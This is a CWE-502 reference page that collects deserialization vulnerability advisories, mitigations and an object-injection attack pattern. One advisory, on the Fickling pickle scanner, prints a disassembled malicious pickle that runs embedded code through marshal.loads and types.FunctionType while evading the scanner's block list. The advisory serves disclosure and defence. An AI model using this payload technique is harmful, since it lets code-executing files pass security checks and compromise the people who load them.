CWE-502
AllowedDeserialization of Untrusted Data
Abstraction: Base · Status: Draft
The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
4797 vulnerabilities reference this CWE, most recent first.
GHSA-54Q6-CWPF-M2C8
Vulnerability from github – Published: 2023-05-09 15:30 – Updated: 2024-04-04 03:55A vulnerability has been identified in Siveillance Video 2020 R2 (All versions < V20.2 HotfixRev14), Siveillance Video 2020 R3 (All versions < V20.3 HotfixRev12), Siveillance Video 2021 R1 (All versions < V21.1 HotfixRev12), Siveillance Video 2021 R2 (All versions < V21.2 HotfixRev8), Siveillance Video 2022 R1 (All versions < V22.1 HotfixRev7), Siveillance Video 2022 R2 (All versions < V22.2 HotfixRev5), Siveillance Video 2022 R3 (All versions < V22.3 HotfixRev2), Siveillance Video 2023 R1 (All versions < V23.1 HotfixRev1). The Event Server component of affected applications deserializes data without sufficient validations. This could allow an authenticated remote attacker to execute code on the affected system.
{
"affected": [],
"aliases": [
"CVE-2023-30898"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-05-09T13:15:18Z",
"severity": "HIGH"
},
"details": "A vulnerability has been identified in Siveillance Video 2020 R2 (All versions \u003c V20.2 HotfixRev14), Siveillance Video 2020 R3 (All versions \u003c V20.3 HotfixRev12), Siveillance Video 2021 R1 (All versions \u003c V21.1 HotfixRev12), Siveillance Video 2021 R2 (All versions \u003c V21.2 HotfixRev8), Siveillance Video 2022 R1 (All versions \u003c V22.1 HotfixRev7), Siveillance Video 2022 R2 (All versions \u003c V22.2 HotfixRev5), Siveillance Video 2022 R3 (All versions \u003c V22.3 HotfixRev2), Siveillance Video 2023 R1 (All versions \u003c V23.1 HotfixRev1). The Event Server component of affected applications deserializes data without sufficient validations. This could allow an authenticated remote attacker to execute code on the affected system.",
"id": "GHSA-54q6-cwpf-m2c8",
"modified": "2024-04-04T03:55:27Z",
"published": "2023-05-09T15:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30898"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-789345.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-554M-HJXR-QF42
Vulnerability from github – Published: 2025-08-20 09:30 – Updated: 2026-04-01 18:35Deserialization of Untrusted Data vulnerability in QuanticaLabs MediCenter - Health Medical Clinic allows Object Injection. This issue affects MediCenter - Health Medical Clinic: from n/a through 15.1.
{
"affected": [],
"aliases": [
"CVE-2025-54014"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-20T08:15:45Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data vulnerability in QuanticaLabs MediCenter - Health Medical Clinic allows Object Injection. This issue affects MediCenter - Health Medical Clinic: from n/a through 15.1.",
"id": "GHSA-554m-hjxr-qf42",
"modified": "2026-04-01T18:35:56Z",
"published": "2025-08-20T09:30:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54014"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/theme/medicenter/vulnerability/wordpress-medicenter-health-medical-clinic-15-1-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-556J-VV66-V5JP
Vulnerability from github – Published: 2026-07-01 21:36 – Updated: 2026-07-02 18:36An issue in Pivotal CRM 6.6.4.08 and systems using patch-ghi-15381-cwe-502-20251225.zip (fixed in Pivotal CRM 6.6.5.10 and Patch_CWE502_20260316.zip) allows a remote attacker to execute arbitrary code via the Pivotal.Engine.Client.Services.Conversion.dll component. NOTE: this issue exists because of an incomplete fix for CVE-2026-39253.
{
"affected": [],
"aliases": [
"CVE-2026-51947"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-01T19:16:53Z",
"severity": "CRITICAL"
},
"details": "An issue in Pivotal CRM 6.6.4.08 and systems using patch-ghi-15381-cwe-502-20251225.zip (fixed in Pivotal CRM 6.6.5.10 and Patch_CWE502_20260316.zip) allows a remote attacker to execute arbitrary code via the Pivotal.Engine.Client.Services.Conversion.dll component. NOTE: this issue exists because of an incomplete fix for CVE-2026-39253.",
"id": "GHSA-556j-vv66-v5jp",
"modified": "2026-07-02T18:36:24Z",
"published": "2026-07-01T21:36:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-51947"
},
{
"type": "WEB",
"url": "https://support.pivotal.aurea.com/article/129552-remediating-insecure-deserialization-cwe-502-in-pivotal-6-6-04-08-smart-client-pbs"
},
{
"type": "WEB",
"url": "https://timtimxs.github.io/CVE-2026-39253-Advisory"
},
{
"type": "WEB",
"url": "https://timtimxs.github.io/CVE-2026-51947-Advisory"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-55G9-6C2X-GF8Q
Vulnerability from github – Published: 2025-05-26 09:30 – Updated: 2025-06-06 15:37A vulnerability has been found in HumanSignal label-studio-ml-backend up to 9fb7f4aa186612806af2becfb621f6ed8d9fdbaf and classified as problematic. Affected by this vulnerability is the function load of the file label-studio-ml-backend/label_studio_ml/examples/yolo/utils/neural_nets.py of the component PT File Handler. The manipulation of the argument path leads to deserialization. An attack has to be approached locally. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "label-studio-ml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-5173"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-06T15:37:46Z",
"nvd_published_at": "2025-05-26T07:15:26Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been found in HumanSignal label-studio-ml-backend up to 9fb7f4aa186612806af2becfb621f6ed8d9fdbaf and classified as problematic. Affected by this vulnerability is the function load of the file label-studio-ml-backend/label_studio_ml/examples/yolo/utils/neural_nets.py of the component PT File Handler. The manipulation of the argument path leads to deserialization. An attack has to be approached locally. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.",
"id": "GHSA-55g9-6c2x-gf8q",
"modified": "2025-06-06T15:37:46Z",
"published": "2025-05-26T09:30:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5173"
},
{
"type": "WEB",
"url": "https://github.com/HumanSignal/label-studio-ml-backend/issues/765"
},
{
"type": "PACKAGE",
"url": "https://github.com/HumanSignal/label-studio-ml-backend"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.310261"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.310261"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.578126"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "HumanSignal label-studio-ml-backend Deserialization of Untrusted Data vulnerability"
}
GHSA-5639-7QCH-2GCR
Vulnerability from github – Published: 2024-12-21 09:30 – Updated: 2026-04-08 18:33The Custom Product Tabs For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.4 via deserialization of untrusted input from the 'wb_custom_tabs' parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
{
"affected": [],
"aliases": [
"CVE-2024-12721"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-21T07:15:09Z",
"severity": "HIGH"
},
"details": "The Custom Product Tabs For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.4 via deserialization of untrusted input from the \u0027wb_custom_tabs\u0027 parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.",
"id": "GHSA-5639-7qch-2gcr",
"modified": "2026-04-08T18:33:46Z",
"published": "2024-12-21T09:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12721"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wb-custom-product-tabs-for-woocommerce/trunk/includes/class-wb-custom-product-tabs-for-woocommerce.php#L366"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=3213473%40wb-custom-product-tabs-for-woocommerce\u0026new=3213473%40wb-custom-product-tabs-for-woocommerce\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3fdc6a04-ef39-498a-b739-f40d5d8af47e?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-565G-HWWR-4PP3
Vulnerability from github – Published: 2025-12-15 23:35 – Updated: 2025-12-20 02:30Fickling Assessment
Based on the test case provided in the original report below, this bypass was caused by marshal and types missing from the block list of unsafe module imports, Fickling started blocking both modules to address this issue. This was fixed in https://github.com/trailofbits/fickling/pull/186. The crash is unrelated and has no security impact—it will be addressed separately.
Original report
Summary
There's missing detection for the python modules, marshal.loads and types.FunctionType and Fickling throws unhandled ValueErrors when the stack is deliberately exhausted.
Details
Fickling simply doesn't have the aforementioned modules in its list of unsafe imports and therefore it fails to get detected.
PoC
The following is a disassembled view of a malicious pickle file that uses these modules:
0: \x80 PROTO 4
2: \x95 FRAME 0
11: \x8c SHORT_BINUNICODE 'marshal'
20: \x8c SHORT_BINUNICODE 'loads'
27: \x93 STACK_GLOBAL
28: \x94 MEMOIZE (as 0)
29: h BINGET 0
31: C SHORT_BINBYTES b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xf30\x00\x00\x00\x95\x00S\x00S\x01K\x00r\x00\\\x00R\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"\x00S\x025\x01\x00\x00\x00\x00\x00\x00 \x00g\x01)\x03\xe9\x00\x00\x00\x00N\xda\x02id)\x02\xda\x02os\xda\x06system\xa9\x00\xf3\x00\x00\x00\x00\xda\x08<string>\xda\x08<module>r\t\x00\x00\x00\x01\x00\x00\x00s\x13\x00\x00\x00\xf0\x03\x01\x01\x01\xe3\x00\t\xd8\x00\x02\x87\t\x82\t\x88$\x85\x0fr\x07\x00\x00\x00'
198: \x85 TUPLE1
199: R REDUCE
200: \x94 MEMOIZE (as 1)
201: \x8c SHORT_BINUNICODE 'types'
208: \x8c SHORT_BINUNICODE 'FunctionType'
222: \x93 STACK_GLOBAL
223: \x94 MEMOIZE (as 2)
224: h BINGET 2
226: h BINGET 1
228: } EMPTY_DICT
229: \x86 TUPLE2
230: R REDUCE
231: \x94 MEMOIZE (as 3)
232: h BINGET 3
234: ) EMPTY_TUPLE
235: R REDUCE
236: \x94 MEMOIZE (as 4)
237: \x8c SHORT_BINUNICODE 'gottem'
245: b BUILD
246: . STOP
```
When analyzing this modified file, safety_result.json shows:
{ "severity": "LIKELY_SAFE", "analysis": "Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\n\n", "detailed_results": {} }
Furthermore, when we run `fickling -s <path_to_malicious_file>`, we also encounter this error:
Traceback (most recent call last): File "/fickling", line 7, in sys.exit(main()) ^^^^^^ File "/fickling/cli.py", line 163, in main safety_results = check_safety(pickled, json_output_path=json_output_path) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/analysis.py", line 408, in check_safety results = analyzer.analyze(pickled) ^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/analysis.py", line 65, in analyze context.analyze(a) File "/fickling/analysis.py", line 31, in analyze results = list(analysis.analyze(self)) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/analysis.py", line 196, in analyze for node in context.pickled.non_standard_imports(): ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/fickle.py", line 826, in non_standard_imports for node in self.properties.imports: ^^^^^^^^^^^^^^^ File "/fickling/fickle.py", line 777, in properties self._properties.visit(self.ast) ^^^^^^^^ File "/fickling/fickle.py", line 833, in ast self._ast = Interpreter.interpret(self) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/fickle.py", line 1001, in interpret return Interpreter(pickled).to_ast() ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/fickle.py", line 927, in to_ast self.run() File "/fickling/fickle.py", line 971, in run self.step() File "/fickling/fickle.py", line 989, in step opcode.run(self) File "/fickling/fickle.py", line 1767, in run raise ValueError("Exhausted the stack while searching for a MarkObject!") ValueError: Exhausted the stack while searching for a MarkObject! ```
Impact
This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for types.FunctionType and marshal.loads. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "fickling"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-67747"
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-15T23:35:55Z",
"nvd_published_at": "2025-12-16T01:15:52Z",
"severity": "HIGH"
},
"details": "## Fickling Assessment\n\nBased on the test case provided in the original report below, this bypass was caused by `marshal` and `types` missing from the block list of unsafe module imports, Fickling started blocking both modules to address this issue. This was fixed in https://github.com/trailofbits/fickling/pull/186. The crash is unrelated and has no security impact\u2014it will be addressed separately.\n\n## Original report\n\n### Summary\nThere\u0027s missing detection for the python modules, `marshal.loads` and `types.FunctionType` and Fickling throws unhandled ValueErrors when the stack is deliberately exhausted.\n\n### Details\nFickling simply doesn\u0027t have the aforementioned modules in its list of unsafe imports and therefore it fails to get detected.\n\n### PoC\nThe following is a disassembled view of a malicious pickle file that uses these modules:\n```\n 0: \\x80 PROTO 4\n 2: \\x95 FRAME 0\n 11: \\x8c SHORT_BINUNICODE \u0027marshal\u0027\n 20: \\x8c SHORT_BINUNICODE \u0027loads\u0027\n 27: \\x93 STACK_GLOBAL\n 28: \\x94 MEMOIZE (as 0)\n 29: h BINGET 0\n 31: C SHORT_BINBYTES b\u0027\\xe3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf30\\x00\\x00\\x00\\x95\\x00S\\x00S\\x01K\\x00r\\x00\\\\\\x00R\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\\x00S\\x025\\x01\\x00\\x00\\x00\\x00\\x00\\x00 \\x00g\\x01)\\x03\\xe9\\x00\\x00\\x00\\x00N\\xda\\x02id)\\x02\\xda\\x02os\\xda\\x06system\\xa9\\x00\\xf3\\x00\\x00\\x00\\x00\\xda\\x08\u003cstring\u003e\\xda\\x08\u003cmodule\u003er\\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00s\\x13\\x00\\x00\\x00\\xf0\\x03\\x01\\x01\\x01\\xe3\\x00\\t\\xd8\\x00\\x02\\x87\\t\\x82\\t\\x88$\\x85\\x0fr\\x07\\x00\\x00\\x00\u0027\n 198: \\x85 TUPLE1\n 199: R REDUCE\n 200: \\x94 MEMOIZE (as 1)\n 201: \\x8c SHORT_BINUNICODE \u0027types\u0027\n 208: \\x8c SHORT_BINUNICODE \u0027FunctionType\u0027\n 222: \\x93 STACK_GLOBAL\n 223: \\x94 MEMOIZE (as 2)\n 224: h BINGET 2\n 226: h BINGET 1\n 228: } EMPTY_DICT\n 229: \\x86 TUPLE2\n 230: R REDUCE\n 231: \\x94 MEMOIZE (as 3)\n 232: h BINGET 3\n 234: ) EMPTY_TUPLE\n 235: R REDUCE\n 236: \\x94 MEMOIZE (as 4)\n 237: \\x8c SHORT_BINUNICODE \u0027gottem\u0027\n 245: b BUILD\n 246: . STOP\n ```\n\nWhen analyzing this modified file, safety_result.json shows:\n```\n{\n \"severity\": \"LIKELY_SAFE\",\n \"analysis\": \"Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\\n\\n\",\n \"detailed_results\": {}\n}\n```\n\nFurthermore, when we run `fickling -s \u003cpath_to_malicious_file\u003e`, we also encounter this error:\n```\nTraceback (most recent call last):\n File \"\u003cpath\u003e/fickling\", line 7, in \u003cmodule\u003e\n sys.exit(main())\n ^^^^^^\n File \"\u003cpath\u003e/fickling/cli.py\", line 163, in main\n safety_results = check_safety(pickled, json_output_path=json_output_path)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\u003cpath\u003e/fickling/analysis.py\", line 408, in check_safety\n results = analyzer.analyze(pickled)\n ^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\u003cpath\u003e/fickling/analysis.py\", line 65, in analyze\n context.analyze(a)\n File \"\u003cpath\u003e/fickling/analysis.py\", line 31, in analyze\n results = list(analysis.analyze(self))\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\u003cpath\u003e/fickling/analysis.py\", line 196, in analyze\n for node in context.pickled.non_standard_imports():\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\u003cpath\u003e/fickling/fickle.py\", line 826, in non_standard_imports\n for node in self.properties.imports:\n ^^^^^^^^^^^^^^^\n File \"\u003cpath\u003e/fickling/fickle.py\", line 777, in properties\n self._properties.visit(self.ast)\n ^^^^^^^^\n File \"\u003cpath\u003e/fickling/fickle.py\", line 833, in ast\n self._ast = Interpreter.interpret(self)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\u003cpath\u003e/fickling/fickle.py\", line 1001, in interpret\n return Interpreter(pickled).to_ast()\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\u003cpath\u003e/fickling/fickle.py\", line 927, in to_ast\n self.run()\n File \"\u003cpath\u003e/fickling/fickle.py\", line 971, in run\n self.step()\n File \"\u003cpath\u003e/fickling/fickle.py\", line 989, in step\n opcode.run(self)\n File \"\u003cpath\u003e/fickling/fickle.py\", line 1767, in run\n raise ValueError(\"Exhausted the stack while searching for a MarkObject!\")\nValueError: Exhausted the stack while searching for a MarkObject!\n```\n\n### Impact\nThis allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.",
"id": "GHSA-565g-hwwr-4pp3",
"modified": "2025-12-20T02:30:33Z",
"published": "2025-12-15T23:35:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67747"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/pull/186"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913"
},
{
"type": "PACKAGE",
"url": "https://github.com/trailofbits/fickling"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Fickling has missing detection for marshal.loads and types.FunctionType in unsafe modules list"
}
GHSA-56C5-9V4W-8RJP
Vulnerability from github – Published: 2024-06-12 21:31 – Updated: 2024-06-12 21:31There is a vulnerability in AVEVA PI Web API that could allow malicious code to execute on the PI Web API environment under the privileges of an interactive user that was socially engineered to use API XML import functionality with content supplied by an attacker.
{
"affected": [],
"aliases": [
"CVE-2024-3468"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-12T21:15:50Z",
"severity": null
},
"details": "There is a vulnerability in AVEVA PI Web API that could allow malicious code to execute on the PI Web API environment under the privileges of an interactive user that was socially engineered to use API XML import functionality with content supplied by an attacker.",
"id": "GHSA-56c5-9v4w-8rjp",
"modified": "2024-06-12T21:31:19Z",
"published": "2024-06-12T21:31:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3468"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-163-02"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-56CF-PH82-J46R
Vulnerability from github – Published: 2026-03-25 18:31 – Updated: 2026-03-26 18:31Deserialization of Untrusted Data vulnerability in park_of_ideas Ricky ricky allows Object Injection.This issue affects Ricky: from n/a through < 2.31.
{
"affected": [],
"aliases": [
"CVE-2026-25032"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-25T17:16:42Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data vulnerability in park_of_ideas Ricky ricky allows Object Injection.This issue affects Ricky: from n/a through \u003c 2.31.",
"id": "GHSA-56cf-ph82-j46r",
"modified": "2026-03-26T18:31:33Z",
"published": "2026-03-25T18:31:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25032"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Theme/ricky/vulnerability/wordpress-ricky-theme-2-31-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-56F8-PJC6-475M
Vulnerability from github – Published: 2026-03-05 06:30 – Updated: 2026-03-09 18:31Deserialization of Untrusted Data vulnerability in BoldThemes Celeste celeste allows Object Injection.This issue affects Celeste: from n/a through <= 1.3.6.
{
"affected": [],
"aliases": [
"CVE-2026-27369"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-05T06:16:26Z",
"severity": "HIGH"
},
"details": "Deserialization of Untrusted Data vulnerability in BoldThemes Celeste celeste allows Object Injection.This issue affects Celeste: from n/a through \u003c= 1.3.6.",
"id": "GHSA-56f8-pjc6-475m",
"modified": "2026-03-09T18:31:38Z",
"published": "2026-03-05T06:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27369"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Theme/celeste/vulnerability/wordpress-celeste-theme-1-3-6-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-56M9-5M6M-WM57
Vulnerability from github – Published: 2022-02-01 00:00 – Updated: 2026-07-05 03:30PrinterLogic Web Stack versions 19.1.1.13 SP9 and below deserializes attacker controlled leading to pre-auth remote code execution.
{
"affected": [],
"aliases": [
"CVE-2021-42631"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-31T18:15:00Z",
"severity": "HIGH"
},
"details": "PrinterLogic Web Stack versions 19.1.1.13 SP9 and below deserializes attacker controlled leading to pre-auth remote code execution.",
"id": "GHSA-56m9-5m6m-wm57",
"modified": "2026-07-05T03:30:45Z",
"published": "2022-02-01T00:00:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42631"
},
{
"type": "WEB",
"url": "https://portswigger.net/daily-swig/printerlogic-vendor-addresses-triple-rce-threat-against-all-connected-endpoints"
},
{
"type": "WEB",
"url": "https://securityaffairs.co/wordpress/127194/security/printerlogic-printer-management-suite-flaws.html"
},
{
"type": "WEB",
"url": "https://thecyberthrone.in/2022/01/26/printerlogic-%F0%9F%96%A8-fixes-critical-vulnerabilities-in-its-suite/?utm_source=rss\u0026utm_medium=rss\u0026utm_campaign=printerlogic-%25f0%259f%2596%25a8-fixes-critical-vulnerabilities-in-its-suite"
},
{
"type": "WEB",
"url": "https://www.printerlogic.com/security-bulletin"
},
{
"type": "WEB",
"url": "https://www.securityweek.com/printerlogic-patches-code-execution-flaws-printer-management-suite"
},
{
"type": "WEB",
"url": "https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-printerlogic-issues-security-alert"
},
{
"type": "WEB",
"url": "http://printerlogic.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
Mitigation
When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
Mitigation
Explicitly define a final object() to prevent deserialization.
Mitigation
- Make fields transient to protect them from deserialization.
- An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.
Mitigation
Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-586: Object Injection
An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.